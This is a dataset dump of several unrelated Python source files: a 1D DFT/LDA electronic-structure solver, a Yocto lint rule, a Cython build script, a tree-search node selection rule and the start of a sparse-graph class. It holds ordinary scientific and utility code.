array_like\n 1D array of the ground-state electron density, indexed as density[space_index]\n\n returns float\n The Hartree energy of the ground-state system\n \"\"\"\n E_h = 0.5*np.dot(v_h,density)*pm.space.delta\n\n return E_h\n\n\ndef xc_energy(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation energy. Uses the LDAs developed in \n [Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. math ::\n\n E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n] = \\int \\varepsilon_{\\mathrm{xc}}(n) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation energy into separate exchange and correlation terms\n - False: Just return the exchange-correlation energy \n\n returns float\n Exchange-correlation energy\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.exc_lda[NE]\n e_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n \n # HEG LDA\n else:\n p = LDA_parameters.ex_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n e_x = np.zeros(pm.space.npt, dtype=np.float)\n e_c = np.copy(e_x)\n for j in range(pm.space.npt):\n if(n[j] != 0.0):\n\n # Exchange energy per electron\n e_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + p['d']*n[j]**3 + p['e']*n[j]**4 + p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation energy per electron\n r_s = 0.5/n[j]\n e_c[j] = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*np.log(1.0 + \\\n q['f']*r_s + q['g']*r_s**2)/q['f']\n\n # Exchange-correlation energy per electron\n e_xc = e_x + e_c\n\n # Exchange-correlation energy\n E_xc = np.dot(e_xc, n)*pm.space.delta\n\n # Separate exchange and correlation contributions\n if separate == True:\n E_x = np.dot(e_x, n)*pm.space.delta\n E_c = np.dot(e_c, n)*pm.space.delta\n return E_xc, E_x, E_c\n else:\n return E_xc\n\n\ndef xc_potential(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation potential. Uses the LDAs developed in \n [Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. math ::\n\n V_{\\mathrm{xc}}^{\\mathrm{LDA}}(x) = \\frac{\\delta E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n]}{\\delta n(x)}\n = \\varepsilon_{\\mathrm{xc}}(n(x)) + n(x)\\frac{d\\varepsilon_{\\mathrm{xc}}}{dn} \\bigg|_{n(x)}\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation potential into separate exchange and correlation terms\n - False: Just return the exchange-correlation potential \n\n returns array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.vxc_lda[NE]\n v_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n\n # HEG LDA\n else:\n p = LDA_parameters.vx_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n v_x = np.zeros(pm.space.npt, dtype=np.float)\n v_c = np.copy(v_x)\n for j in range(pm.space.npt):\n if n[j] != 0.0:\n\n # Exchange potential\n v_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + \\\n p['d']*n[j]**3 + p['e']*n[j]**4 + \\\n p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation potential\n r_s = 0.5/n[j]\n energy = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*\\\n np.log(1.0 + q['f']*r_s + q['g']*r_s**2)/q['f']\n derivative = ((r_s*(q['a'] + q['e']*r_s)*(q['b'] + r_s*(2.0*q['c'] + 3.0*q['d']*r_s))*np.log(1.0 + \\\n q['f']*r_s + q['g']*(r_s**2)) - (r_s*(q['a'] + q['e']*r_s)*(q['f'] + 2.0*q['g']*r_s)*\\\n (q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)/(q['f']*r_s + q['g']*(r_s**2) + \\\n 1.0)) - ((q['a'] + 2.0*q['e']*r_s)*(q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)*\\\n np.log(1.0 + q['f']*r_s + q['g']*(r_s**2))))/(q['f']*(q['b']*r_s + q['c']*(r_s**2) + \\\n q['d']*(r_s**3) + 1.0)**2))\n\n v_c[j] = energy - r_s*derivative\n \n # Exchange-correlation potential\n v_xc = v_x + v_c\n\n if separate == True:\n return v_xc, v_x, v_c\n else:\n return v_xc\n\n\ndef DXC(pm, n): \n r\"\"\"Calculates the derivative of the exchange-correlation potential, necessary for the RPA \n preconditioner.\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n\n returns array_like\n 1D array of the derivative of the exchange-correlation potential, indexed as D_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Currently only the finite LDAs can be used\n if NE != 'heg':\n p = LDA_parameters.dlda[NE]\n D_xc = (p['a'] + n*(p['b'] + n*(p['c'] + n*(p['d'] + n*(p['e'] + n*p['f'])))))*(n**p['g'])\n else: \n raise IOError(\"Currently the HEG LDA is not implemented for the RPA preconditioner.\")\n\n return D_xc \n\n\ndef total_energy_eigv(pm, eigenvalues, orbitals=None, density=None, v_h=None, v_xc=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham eigenvalues.\n\n .. math ::\n\n E[n] = \\sum_{j=1}^{N} \\varepsilon_j + E_{xc}[n] - E_H[n] - \\int n(x) V_{xc}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n v_xc : array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n if orbitals is None:\n raise ValueError(\"Need to specify either density or orbitals\")\n else:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n if v_xc is None:\n v_xc = xc_potential(pm, density)\n\n # Kohn-Sham eigenvalues\n E = 0.0\n for j in range(pm.sys.NE):\n E += eigenvalues[j]\n\n # Hartree Energy\n E -= hartree_energy(pm, v_h, density)\n\n # Exchange-correlation potential term\n E -= np.dot(density, v_xc)*pm.space.delta\n \n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n return E.real\n\n\ndef total_energy_eigf(pm, orbitals, density=None, v_h=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham orbitals.\n\n .. math ::\n\n E[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle + E_H[n] + E_{xc}[n] \n + \\int n(x) V_{\\mathrm{ext}}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n\n # Kinetic energy\n E = 0.0\n E += kinetic_energy(pm, orbitals)\n\n # Hartree energy\n E += hartree_energy(pm, v_h, density)\n\n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n # External potential term\n E += np.dot(pm.space.v_ext, density)*pm.space.delta\n\n return E.real\n\n\ndef kinetic_energy(pm, orbitals):\n r\"\"\"Calculates the kinetic energy from the Kohn-Sham orbitals.\n\n .. math ::\n\n T_{s}[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n \"\"\"\n # Kinetic energy matrix\n sd = pm.space.second_derivative\n sd_ind = pm.space.second_derivative_indices\n K = -0.5*sps.diags(sd, sd_ind, shape=(pm.space.npt, pm.space.npt), dtype=np.float, format='csr')\n\n # Kinetic energy of each occupied orbital\n occ = orbitals[:,:pm.sys.NE]\n eigenvalues = (occ.conj() * K.dot(occ)).sum(0)*pm.space.delta\n\n return np.sum(eigenvalues)\n\n\ndef calculate_current_density(pm, density):\n r\"\"\"Calculates the current density from the time-dependent electron density by solving the \n continuity equation.\n\n .. math:: \n\n \\frac{\\partial n}{\\partial t} + \\frac{\\partial j}{\\partial x} = 0\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 2D array of the time-dependent density, indexed as density[time_index,space_index]\n\n returns array_like\n 2D array of the current density, indexed as current_density[time_index,space_index]\n \"\"\"\n pm.sprint('', 1)\n string = 'LDA: calculating current density'\n pm.sprint(string, 1)\n current_density = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n for i in range(1, pm.sys.imax):\n string = 'LDA: t = {:.5f}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n J = np.zeros(pm.space.npt, dtype=np.float)\n J = RE_cython.continuity_eqn(pm, density[i,:], density[i-1,:])\n current_density[i,:] = J[:]\n pm.sprint('', 1)\n\n return current_density\n\n\ndef crank_nicolson_step(pm, orbitals, H_full):\n r\"\"\"Solves Crank Nicolson Equation\n\n .. math::\n\n \\left(I + i\\frac{dt}{2} H\\right) \\Psi(x,t+dt) = \\left(I - i \\frac{dt}{2} H\\right) \\Psi(x,t)\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n\n returns\n \"\"\"\n # Construct matrices\n dH = 0.5j*pm.sys.deltat*H_full\n identity = np.identity(pm.space.npt, dtype=np.cfloat)\n A = identity + dH\n Abar = identity - dH\n \n # Solve for all single-particle states at once\n RHS = np.dot(Abar, orbitals[:, :pm.sys.NE])\n orbitals_new = spla.solve(A, RHS)\n\n return orbitals_new\n\n\ndef main(parameters):\n r\"\"\"Performs LDA calculation\n\n parameters\n ----------\n parameters : object\n Parameters object\n\n returns object\n Results object\n \"\"\"\n # Array initialisations \n pm = parameters\n string = 'LDA: constructing arrays'\n pm.sprint(string, 1) \n pm.setup_space()\n\n # Take external potential as the initial guess to the Kohn-Sham potential\n H = hamiltonian(pm, v_ks=pm.space.v_ext)\n n_inp, orbitals, eigenvalues = groundstate(pm, H)\n E = total_energy_eigv(pm, eigenvalues=eigenvalues, density=n_inp)\n\n # Need n_inp and n_out to start mixing\n H = hamiltonian(pm, v_ks=ks_potential(pm, n_inp))\n n_out, orbitals_out, eigenvalues_out = groundstate(pm, H)\n\n # Mixing scheme\n if pm.lda.scf_type == 'pulay':\n mixer = mix.PulayMixer(pm, order=pm.lda.pulay_order, preconditioner=pm.lda.pulay_preconditioner)\n elif pm.lda.scf_type == 'cg':\n minimizer = minimize.CGMinimizer(pm, total_energy_eigf)\n elif pm.lda.scf_type == 'mixh':\n minimizer = minimize.DiagMinimizer(pm, total_energy_eigf)\n H_mix = copy.copy(H)\n\n # Find the self-consistent solution\n iteration = 1\n converged = False\n while (not converged) and iteration <= pm.lda.max_iter:\n E_old = E\n\n # Conjugate-gradient minimization starts with orbitals, H[orbitals]\n if pm.lda.scf_type == 'cg':\n\n orbitals = minimizer.step(orbitals, banded_to_full(pm, H))\n n_inp = electron_density(pm, orbitals)\n\n # Calculate total energy at n_inp\n E = total_energy_eigf(pm, orbitals=orbitals, density=n_inp)\n\n # Minimization that mixes Hamiltonian directly starts with n_inp, H[n_inp]\n elif pm.lda.scf_type == 'mixh':\n\n n_tmp, orbitals_tmp, eigenvalues_tmp = groundstate(pm,H_mix)\n H_tmp = hamiltonian(pm, v_ks=ks_potential(pm, n_tmp))\n\n H_mix = minimizer.h_step(H_mix, H_tmp)\n n_inp, orbitals_inp, eigenvalues_inp = groundstate(pm,H_mix)\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_inp, density=n_inp)\n\n # Mixing schemes starting with n_inp, n_out (Pulay, linear or none)\n else:\n\n # Calculate new n_inp\n if pm.lda.scf_type == 'pulay':\n n_inp = mixer.mix(n_inp, n_out, eigenvalues_out, orbitals_out.T)\n elif pm.lda.scf_type == 'linear':\n n_inp = (1-pm.lda.mix)*n_inp + pm.lda.mix*n_out\n else:\n n_inp = n_out\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_out, density=n_inp)\n\n # Calculate new Kohn-Sham potential and update the Hamiltonian\n v_ks = ks_potential(pm, n_inp)\n H = hamiltonian(pm, v_ks=v_ks)\n\n # Calculate new n_out\n n_out, orbitals_out, eigenvalues_out = groundstate(pm,H)\n\n # Calculate the Kohn-Sham gap\n gap = eigenvalues_out[pm.sys.NE]- eigenvalues_out[pm.sys.NE-1]\n if gap < 1e-3:\n string = \"\\nLDA: Warning: small KS gap {:.3e} Ha. Convergence may be slow.\".format(gap)\n pm.sprint(string, 1)\n\n # Calculate the self-consistent density and energy error\n dn = np.sum(np.abs(n_inp-n_out))*pm.space.delta\n dE = E - E_old\n\n # Check if converged\n converged = dn < pm.lda.tol and np.abs(dE) < pm.lda.etol\n string = 'LDA: E = {:.8f} Ha, de = {:+.3e}, dn = {:.3e}, iter = {}'.format(E, dE, dn, iteration)\n pm.sprint(string, 1, newline=False)\n\n # Iterate\n iteration += 1\n\n iteration -= 1\n pm.sprint('')\n\n # Print to screen\n if not converged:\n string = 'LDA: Warning: convergence not reached in {} iterations. Terminating.'.format(iteration)\n pm.sprint(string, 1)\n else:\n pm.sprint('LDA: reached convergence in {} iterations.'.format(iteration),0)\n\n # Self-consistent solution\n density = n_out\n orbitals = orbitals_out\n eigenvalues = eigenvalues_out\n \n # Calculate potentials and energies\n if pm.lda.NE == 'heg':\n E_xc, E_x, E_c = xc_energy(pm, density, separate=True)\n v_xc, v_x, v_c = xc_potential(pm, density, separate=True)\n else:\n E_xc = xc_energy(pm, density)\n v_xc = xc_potential(pm, density)\n v_h = hartree_potential(pm, density)\n v_ks = pm.space.v_ext + v_h + v_xc\n E = total_energy_eigf(pm, orbitals=orbitals, density=density)\n E_h = hartree_energy(pm, v_h, density)\n E_hxc = E_h + E_xc\n\n # Print to screen\n pm.sprint('LDA: ground-state energy: {}'.format(E),1)\n pm.sprint('LDA: ground-state Hartree exchange-correlation energy: {}'.format(E_hxc),1)\n pm.sprint('LDA: ground-state Hartree energy: {}'.format(E_h),1)\n pm.sprint('LDA: ground-state exchange-correlation energy: {}'.format(E_xc),1)\n if pm.lda.NE == 'heg':\n pm.sprint('LDA: ground-state exchange energy: {}'.format(E_x),1)\n pm.sprint('LDA: ground-state correlation energy: {}'.format(E_c),1)\n\n # Save the quantities to file\n results = rs.Results()\n results.add(density, 'gs_lda{}_den'.format(pm.lda.NE))\n results.add(v_h, 'gs_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc, 'gs_lda{}_vxc'.format(pm.lda.NE))\n results.add(v_ks, 'gs_lda{}_vks'.format(pm.lda.NE))\n results.add(E, 'gs_lda{}_E'.format(pm.lda.NE))\n results.add(E_xc, 'gs_lda{}_Exc'.format(pm.lda.NE))\n results.add(E_h, 'gs_lda{}_Eh'.format(pm.lda.NE))\n results.add(E_hxc, 'gs_lda{}_Ehxc'.format(pm.lda.NE))\n if pm.lda.NE == 'heg' :\n results.add(E_x, 'gs_lda{}_Ex'.format(pm.lda.NE))\n results.add(E_c, 'gs_lda{}_Ec'.format(pm.lda.NE))\n results.add(v_x, 'gs_lda{}_vx'.format(pm.lda.NE))\n results.add(v_c, 'gs_lda{}_vc'.format(pm.lda.NE))\n results.add(orbitals.T,'gs_lda{}_eigf'.format(pm.lda.NE))\n results.add(eigenvalues,'gs_lda{}_eigv'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n # Propagate through real time\n if pm.run.time_dependence:\n\n # Construct arrays\n v_ks_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_xc_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_h_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n current = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n density_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n orbitals = orbitals.astype(np.cfloat)\n\n # Save the ground-state\n v_ks_td[0,:] = v_ks[:]\n v_h_td[0,:] = v_h[:]\n v_xc_td[0,:] = v_xc[:]\n density_td[0,:] = density[:]\n\n # Perform real time iterations\n for i in range(1, pm.sys.imax):\n\n # Print to screen \n string = 'LDA: evolving through real time: t = {}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n\n # Construct the Hamiltonian\n H = hamiltonian(pm, orbitals=orbitals, perturbation=True)\n H_full = banded_to_full(pm, H)\n\n # Propagate through time-step using the Crank-Nicolson method \n orbitals[:, :pm.sys.NE] = crank_nicolson_step(pm, orbitals, H_full)\n density_td[i,:] = electron_density(pm, orbitals)\n v_ks_td[i,:] = pm.space.v_ext[:] + pm.space.v_pert[:] + hartree_potential(pm, density_td[i,:]) + xc_potential(pm, density_td[i,:])\n\n # Hartree and exchange-correlation potential\n v_h_td[i,:] = hartree_potential(pm, density_td[i,:])\n v_xc_td[i,:] = xc_potential(pm, density_td[i,:])\n\n # Calculate the current density\n current_density = calculate_current_density(pm, density_td)\n \n # Save the quantities to file\n results.add(v_ks_td, 'td_lda{}_vks'.format(pm.lda.NE))\n results.add(v_h_td, 'td_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc_td, 'td_lda{}_vxc'.format(pm.lda.NE))\n results.add(density_td, 'td_lda{}_den'.format(pm.lda.NE))\n results.add(current_density, 'td_lda{}_cur'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n pm.sprint('',1)\n\n return results\n","sub_path":"iDEA/LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":27181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"621025292","text":"from oelint_adv.cls_rule import Rule\n\n\nclass NoCommentsTrailing(Rule):\n def __init__(self):\n super().__init__(id=\"oelint.comments.notrailing\",\n severity=\"error\",\n message=\"Comments shall be put on seperate lines\")\n\n def check(self, _file, stash):\n res = []\n items = stash.GetItemsFor(filename=_file)\n for i in items:\n if i.Raw:\n for line in i.Raw.split(\"\\n\"):\n line = line.strip()\n if \"#\" in line and line.find(\"#\") > 0:\n res += self.finding(i.Origin, i.InFileLine)\n return res\n","sub_path":"oelint_adv/rule_base/rule_comment_notraling.py","file_name":"rule_comment_notraling.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"281643395","text":"import numpy as np\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n# from Cython.Build import cythonize\n\next_modules = [Extension(\n name=\"js_sc\",\n sources=[\"js_sc.pyx\", \"c_js_sc.cpp\"],\n # extra_objects=[\"fc.o\"], # if you compile fc.cpp separately\n include_dirs = [np.get_include()], # .../site-packages/numpy/core/include\n language=\"c++\",\n # libraries=\n # extra_compile_args = \"...\".split(),\n # extra_link_args = \"...\".split()\n )]\n\nsetup(\n name = 'js_sc',\n cmdclass = {'build_ext': build_ext},\n ext_modules = ext_modules,\n)\n\n","sub_path":"js_sc-setup.py","file_name":"js_sc-setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"72687380","text":"from math import exp, sqrt, log, fabs\nfrom random import random, choice, seed, shuffle\n\n#from ParameterObject import depthscale\n#depthlimit = len(depthscale)+500000\n#========================================================\ndef UBEnergy(nodelist, exploreconstant, verbose):\n #Compute the average uniqueness factor\n uniqscore = [1.0 for x in nodelist]\n for i, node in enumerate(nodelist):\n visits = node.getvisits()\n score = node.getuniquenessdata(nodelist)\n uniqscore[i] = sqrt(visits/score)\n# uniqscore[0] = 0.0\n\n# maxval = max(uniqscore)\n# try:\n# uniqscore = [1.5*x/maxval for x in uniqscore]\n# except ZeroDivisionError:\n# uniqscore = [0.0 for node in nodelist]\n keylist = {}\n for i, node in enumerate(nodelist):\n keylist[str(node)] = uniqscore[i]\n\n selection = sorted(nodelist, key=lambda x:x.getid())\n selection = sorted(selection, key=lambda x:UCT_Unique_Score(x, keylist[str(x)], exploreconstant, doprint=True))[-1]\n print(\"Selecting Node %s with Score: %s\"%(selection.getid(), UCT_Unique_Score(selection, keylist[str(selection)], exploreconstant, doprint=True) ))\n return selection\n#==========================================================\n\ndef UCT_Unique_Score(node, uniqval, exploreconstant, doprint=False):\n \n parent = node.getparent()\n energy = node.getscore()\n visits = node.getvisits()\n# nChildren = len(node.getchildren())\n if parent is None:\n# return -1e30\n parenergy = node.getscore()\n parvisits = visits\n else:\n parenergy = parent.getscore()\n parvisits = parent.getvisits()\n\n\n depth = node.getdepth()\n# _, playoutEList = node.getplayouts()\n _, playoutEList = node.getallplayouts()\n# usedlist = node.getusedlist()\n# playoutEList = node.getenergylist()\n childeng = [child.getscore() for child in node.getnodelist()]\n nodeEnergy = node.getscore()\n nodeweight = nodeEnergy\n# scalefunc = lambda x: log(x, 10.0)\n# scalefunc = lambda x: sqrt(x)\n scalefunc = lambda x: x\n if visits < 10:\n exploitweight = scalefunc(nodeweight)\n else:\n exploitweight = 1e300\n cnt = 1\n# if len(childeng) > 0:\n# for energy in childeng:\n# exploitweight = min(exploitweight, scalefunc(energy))\n# exploitweight += energy\n# cnt += 1\n if len(playoutEList) > 0:\n for i, energy in enumerate(playoutEList):\n exploitweight = min(exploitweight, scalefunc(energy))\n# exploitweight += energy\n# cnt += 1\n exploitweight = exploitweight/cnt\n explore = 0.0\n try:\n explore = uniqval*sqrt(log(parvisits)/visits)\n except (ValueError, ZeroDivisionError):\n explore = uniqval\n\n score = -exploitweight + exploreconstant*explore\n if parent is not None:\n node.setexploitvalue(-exploitweight)\n node.setexplorevalue(explore)\n if depth > depthlimit or (parent is None):\n if doprint:\n try:\n print(\"Node %s (Parent:%s, Depth %s, Visits:%s): Exploit: %s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, -1e20))\n except:\n print(\"Node %s (Parent:Head, Depth %s, Visits:%s): Exploit: %s Score:%s\"%(node.getid(), depth, visits, -exploitweight, -1e20))\n return -1e20\n\n\n if doprint:\n if parent is None:\n print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Score:%s\"%(node.getid(), 'Head', depth, visits, -exploitweight, exploreconstant*explore, score))\n else:\n print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Unique:%s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, exploreconstant*explore, uniqval, score))\n return score\n\n\n\n#========================================================\n\n","sub_path":"SelectionRule.py","file_name":"SelectionRule.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"346762563","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom typing import Optional, Dict, Tuple, Union, Set\nfrom copy import deepcopy\nfrom math import pow, sqrt\nimport time\nfrom threading import Lock\nimport networkx as nx\n\n\n# alias types\n#\nNodeType = str\n\"\"\" the type of a node \"\"\"\n\nNodeUid = str\n\"\"\" a node' unique identifier within the context of the node's type \"\"\"\n\nNodeId = Tuple[NodeType, NodeUid]\n\"\"\" the unique identifier of a node - the concatenation of its' type and uid\"\"\"\n\nNodeKey = str\n\"\"\" jason compliant unique identifier of a node used in hashes \"\"\"\n\nSourceId = NodeId\n\"\"\" unique identifier of the source node in a triple \"\"\"\n\nTargetId = NodeId\n\"\"\" unique identifier of the target node in a triple \"\"\"\n\nEdgeType = str\n\"\"\" the type of an edge \"\"\"\n\nEdgeUid = str\n\"\"\" an edge's unique identifier within the context of the edge's type \"\"\"\n\nEdgeExpired = float\n\"\"\" the timestamp when an edge has expired \"\"\"\n\nEdgeId = Tuple[EdgeType, Optional[EdgeUid], Optional[EdgeExpired]]\n\"\"\" the unique identifier of an edge withing the context of the edge type - a concatenation of Edge type, uid, expired timestamp\"\"\"\n\nTripleId = Tuple[SourceId, EdgeId, TargetId]\n\"\"\" the unique identifier of a triple source node, edge and target node \"\"\"\n\nTripleKey = str\n\"\"\" json compliant unique identifier of a triple used in hashes \"\"\"\n\nPor = dict\n\"\"\" dictionary representing the path of reasoning \"\"\"\n\n\ndef get_node_key(node_id: NodeId) -> NodeKey:\n # ':' special - enables easy splitting of keys to create ids\n #\n return f'{node_id[0]}:{node_id[1]}'\n\n\ndef get_node_id(node_key: NodeKey) -> NodeId:\n # assumes ':' delimits type and uid\n #\n node = node_key.split(':')\n return node[0], node[1]\n\n\ndef get_triple_key(triple_id: TripleId, directional: bool = False) -> TripleKey:\n source_key = get_node_key(node_id=triple_id[0])\n target_key = get_node_key(node_id=triple_id[2])\n\n # if not directional then key will consist of alphanumeric sort of source_key and target_key\n # note ':' special - delimits all components and allows for easy splitting to derive equivalent id\n #\n if (not directional and source_key < target_key) or directional:\n triple_key = f'{source_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{target_key}'\n else:\n triple_key = f'{target_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{source_key}'\n return triple_key\n\n\ndef get_triple_id(triple_key: TripleKey) -> TripleId:\n # assume special ':' character delimits components\n #\n triple = triple_key.split(':')\n\n # Note have to deal with converting string 'None' to type None\n #\n return (triple[0], triple[1]), (triple[2], triple[3] if triple[3] != 'None' else None, float(triple[4]) if triple[4] != 'None' else None), (triple[5], triple[6])\n\n\nclass AMGraph(object):\n \"\"\"\n class to represent a sparse graph of nodes connected by edges\n \"\"\"\n\n # class attribute representing next unique identifier for an instance of AMGraph\n # with associated thread lock\n #\n _next_uid = None\n _uid_lock = Lock()\n\n def __init__(self, uid: Optional[str] = None, graph=None, directional: bool = True, uid_copy: bool = True, normalised: bool = False):\n \"\"\"\n AMGraph represents an sparse graph of nodes connected via edges and capable of performing graph comparisons, learning and merging\n :param uid: optional unique identifier of a graph, if None then autogenerated\n :param graph: optional AMGraph or Dict that will be copied\n :param directional: Boolean flag indicating if edges are directional\n :param uid_copy: Boolean flag indicating if uid of supplied graph should be copied\n :param normalised: Boolean flag indicating edges of graph are normalised\n \"\"\"\n\n # the edges keyed by EdgeKey\n #\n self.edges: dict = {}\n\n # the nodes keyed by NodeKey\n #\n self.nodes: dict = {}\n\n self.directional = directional\n self.normalised = normalised\n\n # dict of NodeKeys with attributes that are graphs\n #\n self.embedded_graphs = {}\n\n self.edgeTypes = set()\n\n self.uid = None\n\n if graph is not None:\n if isinstance(graph, AMGraph):\n self.edges = deepcopy(graph.edges)\n self.nodes = deepcopy(graph.nodes)\n self.embedded_graphs = deepcopy(graph.embedded_graphs)\n self.normalised = graph.normalised\n self.directional = graph.directional\n self.edgeTypes = deepcopy(graph.edgeTypes)\n if uid_copy:\n self.uid = graph.uid\n\n elif isinstance(graph, dict):\n self.edges = deepcopy(graph['edges'])\n self.nodes = deepcopy(graph['nodes'])\n self.directional = graph['directional']\n self.embedded_graphs = deepcopy(graph['embedded_graphs'])\n self.normalised = graph['normalised']\n self.edgeTypes = deepcopy(graph['edgeTypes'])\n\n if uid_copy:\n self.uid = graph['uid']\n\n # reconstruct any embedded graphs\n #\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n self.nodes[node_key][attr] = AMGraph(graph=self.nodes[node_key][attr])\n\n # set the uid if provided\n #\n if uid is not None:\n self.uid = uid\n\n # else if graph has not been provided to copy or copy_uid is not required\n #\n if self.uid is None:\n\n # if the class next_uid is None then start from 1\n #\n with AMGraph._uid_lock:\n\n # set to 1 if never been set before\n #\n if AMGraph._next_uid is None:\n AMGraph._next_uid = 1\n\n # create standard uid\n #\n self.uid = f'_graph_{AMGraph._next_uid}'\n\n # increment for next graphs\n #\n AMGraph._next_uid += 1\n\n def to_dict(self, denormaliser=None) -> dict:\n \"\"\"\n represents graphs as a dictionary\n :return: dictionary with keys: edges, nodes, uid, directional\n \"\"\"\n graph_dict = {'nodes': deepcopy(self.nodes),\n 'edges': deepcopy(self.edges),\n 'edgeTypes': deepcopy(self.edgeTypes),\n 'directional': self.directional,\n 'normalised': self.normalised,\n 'uid': self.uid,\n 'embedded_graphs': deepcopy(self.embedded_graphs),\n 'amgraph': True}\n\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n if denormaliser is not None:\n graph_dict['nodes'][node_key][attr] = denormaliser.denormalise(graph=graph_dict['nodes'][node_key][attr]).to_dict(denormaliser=denormaliser)\n graph_dict['normalised'] = False\n else:\n graph_dict['nodes'][node_key][attr] = graph_dict['nodes'][node_key][attr].to_dict()\n\n return graph_dict\n\n def set_node(self,\n node: Union[NodeKey, NodeId],\n timestamp: 